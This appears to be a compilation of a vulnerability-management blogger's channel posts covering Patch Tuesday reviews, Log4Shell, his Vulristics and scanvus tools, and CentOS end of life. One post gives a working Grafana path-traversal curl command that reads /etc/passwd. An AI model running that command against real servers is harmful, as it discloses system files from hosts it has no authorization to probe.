#Vulristics #DailyExploits for 2021-11-07 based on #Vulners data

1. 2F657CD7-51C1-50EC-9E70-D422A0CCB2B0 - Exploit for CVE-2021-42574
2. 86E0EEED-C430-5343-BCD1-3FF58D995440 - Exploit for CVE-2021-3129

Yet another RCE in Exchange

"CVE-2021-42321 is a RCE vulnerability in Microsoft Exchange Server. The flaw exists due to the improper validation of command-let (cmdlet) arguments. To exploit this vulnerability, an attacker would need to be authenticated to a vulnerable Exchange Server. Microsoft says they are aware of “limited targeted attacks” using this vulnerability in the wild."

Changed the output of results in scanvus. Now it looks like a true hacking tool. Lol 😅

Also I recently added the ability to analyze data from a text file. Let's say you need to check a Linux server that is in a VERY secure segment. You can go there manually via SSH with several hops, 2FA, etc. But scanning such a server can be very inconvenient. With scanvus you can get a bash noscript (--show-inventory-noscript), run it on such host, save the output to a file and check it with scanvus as python3.8 scanvus.py --assessment-type inventory_file --inventory-file-path invent.txt on your desktop for example. You may not even have access yourself, but you can ask the IT administrator to execute the noscript and give you the outputs for analysis.

Plz, press the star on GitHub, if you like it. I want this project to move higher on my profile. 🙃

I participated in #TheStandoff in a good company.
I declared at a hacker conference that as a child I was not interested in offensive security, but biology (entomology, mainly) and that it's related to my current work. Checked. ☑️😅
15 minutes after the end of the call, my Internet provider crashed. Lucky. 😇

FYI, live stream and recordings are here: https://standoff365.com/. Direct link to our talk (live dub in English is available).

Hello everyone! In this episode I want to highlight the latest changes in my #Vulristics project.

Command Line Interface
* CVE lists
* Microsoft Patch Truesdays

Improved Product & Vuln. Type Detection

Microsoft Patch Tuesday November 2021

Video: https://youtu.be/Ta0y02xvfOI
Text: https://avleonov.com/2021/11/30/vulristics-command-line-interface-improved-product-vuln-type-detections-and-microsoft-patch-tuesday-november-2021/

Hello everyone! This episode is about Qualys Security Day 2021 Las Vegas, Qualys VMDR, VMDR Training and exam.

Video: https://youtu.be/jBdD0lNcJCY
Text: https://avleonov.com/2021/12/06/qsc21-vmdr-training-and-exam/

A big Grafana day
$ curl --path-as-is <grafana>/public/plugins/alertlist/../../../../../../../../../../etc/passwd

Have a nice weekend! 😱😈
Log4j CVE-2021-44228

Hello everyone! In this episode, I want to talk about vulnerabilities, news and hype. The easiest way to get timely information on the most important vulnerabilities is to just read the news regularly, right? Well, I will try to reflect on this using two examples from last week (#Grafana LFI and #Log4j "#Log4Shell" RCE).

Video: https://www.youtube.com/watch?v=BqOpw05JmpE
Text: https://avleonov.com/2021/12/13/vulnerability-intelligence-based-on-media-hype-it-works-grafana-lfi-and-log4j-log4shell-rce/

A nice pop-up in Nessus Professional 👍 #Log4Shell

> And we will learn about others with the release of new vendor bulletins

OMG VMware https://www.vmware.com/security/advisories/VMSA-2021-0028.html At least 39 products, CVSS 10

А good list of potentially vulnerable third-party products https://github.com/NCSC-NL/log4shell/tree/main/software #Log4Shell

Hello everyone! It’s even strange to talk about other vulnerabilities, while everyone is so focused on vulnerabilities in log4j. But life doesn’t stop. Other vulnerabilities appear every day. And of course, there are many critical ones among them that require immediate patching. This episode will be about Microsoft Patch Tuesday for December 2021. I will traditionally use my open source Vulristics tool for analysis.

Video: https://www.youtube.com/watch?v=Vqm1CsXlAtc
Text: https://avleonov.com/2021/12/16/microsoft-patch-tuesday-december-2021/
Full report: https://avleonov.com//vulristics_reports/ms_patch_tuesday_december2021_report_with_comments_ext_img.html

#AppX #iSNS #EFS

Hello everyone! I decided to make a separate episode about Log4Shell. Of course, there have already been many reviews of this vulnerability. But I do it primarily for myself. It seems to me that serious problems with Log4j and similar libraries will be with us for a long time. Therefore, it would be interesting to document how it all began. So what is the root cause of Log4Shell?

Video: https://youtu.be/UW7ZY4TmvvU
Text: https://avleonov.com/2021/12/27/log4j-log4shell-rce-explained-cve-2021-44228/

How was my year of security blogging? Quite buzzing. I've tried different things. Something worked out, something not quite. As a result, 34 posts / videos came out. About half of them are reviews of vulnerabilities and other news, the other half are howtos, mini-researches, my open source code, my opinion on various issues. Hopefully the second part will be bigger next year, it looks like the value of this is higher. But the MS Patch Tuesday reviews will remain - this is sacred. 😇 A dozen more topics got bogged down in drafts. I hope that deliberately simplifying the production video (back to the slideshow without my face in the frame) will help finish these topics. And if not, then well, okay. 🙂

Happy New Year!

I hope to distract myself from information security as much as possible during the holidays, which is what I wish everyone. For those of you interested, here's a list of my posts over the past year:

1. Log4j “Log4Shell” RCE explained (CVE-2021-44228)
2. Microsoft Patch Tuesday December 2021
3. Vulnerability Intelligence based on media hype. It works? Grafana LFI and Log4j “Log4Shell” RCE
4. QSC21, VMDR Training and Exam
5. Vulristics Command Line Interface, improved Product & Vuln. Type Detections and Microsoft Patch Tuesday November 2021
6. VMconf 22 Vulnerability Management conference: Call For Papers started
7. Security News: Microsoft Patch Tuesday October 2021, Autodiscover, MysterySnail, Exchange, DNS, Apache, HAProxy, VMware vCenter, Moodle
8. Career Navigator talk for IT Hub College
9. Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostnoscript RCE, FORCEDENTRY Pegasus
10. Microsoft Defender for Endpoint: The Latest Versions of Antivirus Engine & Signatures
11. Security News: Exchange ProxyShell, Zoom RCE, Citrix Canceled PT Acknowledgments, Cisco No Patch Router RCEs
12. Security News: Microsoft Patch Tuesday August 2021, Phishers Started Using reCAPTCHA, Scan 1 IP and Go to Jail
13. How to get Antivirus-related Data from Microsoft Defender for Endpoint using Intune and Graph API
14. Last Week’s Security News: Black Hat Pwnie Awards, iPhone Checks Photos, Evil Windows Print Server, Cisco VPN Routers Takeovers
15. Last Week’s Security news: Serious Sam in Metasploit, PetitPotam, Zimbra Hijack, Joint Advisory TOP30 CVEs
16. How to fix “Nessus failed to load the SSH private key” error?
17. Last Week’s Security news: Pegasus, SeriousSAM, Sequoia
18. My thoughts on the “2021 Gartner Market Guide for Vulnerability Assessment”. What about the quality?
19. Last Week’s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins
20. Vulristics Microsoft Patch Tuesday July 2021: Zero-days EoP in Kernel and RCE in Scripting Engine, RCEs in Kernel, DNS Server, Exchange and Hyper-V
21. Vulristics: Microsoft Patch Tuesdays Q2 2021
22. Last Week’s Security news: PrintNightmare, Kaseya, Intune, Metasploit Docker escape
23. Vulristics HTML Report Update: Table for Products, Table for Vuln. Types and “Prevalence”
24. Last Week’s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee
25. PHDays 10: U.S. Sanctions, My Talk on Vulristics, Other Great Talks Related to VM
26. Getting Hosts from Microsoft Intune MDM using Python
27. AM Live Vulnerability Management Conference Part 2: What was I talking about there
28. AM Live Vulnerability Management Conference Part 1: Full video in Russian + Timecodes in English
29. Vulristics: Microsoft Patch Tuesdays Q1 2021
30. Vulristics: Beyond Microsoft Patch Tuesdays, Analyzing Arbitrary CVEs
31. Microsoft Defender for Endpoint: Why You May Need It and How to Export Hosts via API in Python
32. Vulners Linux Audit API for Host Vulnerability Detection: Manual Auditing, Python Scripting and Licensing
33. Vulristics Vulnerability Score, Automated Data Collection and Microsoft Patch Tuesdays Q4 2020
34. My projects that are not related to Information Security: Yennysay TTS and PyTouchOk companion app

Hello everyone! End of life for CentOS Linux 8 was 31.12.2021. There won't be CentOS Linux as downstream for RedHat anymore. Only CentOS Stream, that will be upstream for CentOS, more like Fedora.

Hello everyone! In this episode, I want to talk about VMconf 22. It was an experiment from the beginning. Is it possible to host a Vulnerability Management event with little effort and budget? Looks like no. So I would like to talk about why the original idea failed and the future of VMconf. #VMconf #vmconf22

Video: https://youtu.be/Zj2GCvvuc9U
Blog: https://avleonov.com/2022/01/08/vmconf-22-why-didnt-it-work-as-planned-and-whats-next/

Hello everyone! This episode will be about Microsoft Patch Tuesday for January 2022. Traditionally, I will use my open source Vulristics tool for analysis. This time I didn’t make any changes to how connectors work. The report generation worked correctly on the first try.

Video: https://youtu.be/RXWvP8X3zIw
Blog: https://avleonov.com/2022/01/16/microsoft-patch-tuesday-january-2022/

Hello everyone! As you probably know, CentOS Linux, the main Enterprise-level Linux server distribution, will soon disappear. It wasn’t hard to predict when RedHat acquired CentOS in 2014, and now it is actually happening. End of life of CentOS Linux 8 was 31.12.2021. There won’t be CentOS Linux as downstream for RedHat anymore. Only CentOS Stream, that will be upstream for RedHat, more or less a testing distro like Fedora.

Of course, it is a matter of debate whether security guys can actually decide which Linux distributions a company will use and set that as a requirement. But in any case, the security guys will definitely take part in the decision. I made a poll in my Telegram channel. 113 people voted. So, let’s take a look at the results and discuss which of the Linux distributions we can recommend to IT teams.

Video: https://youtu.be/9-m6dj-0Q3w
Blogpost: https://avleonov.com/2022/01/21/end-of-centos-linux-where-to-migrate/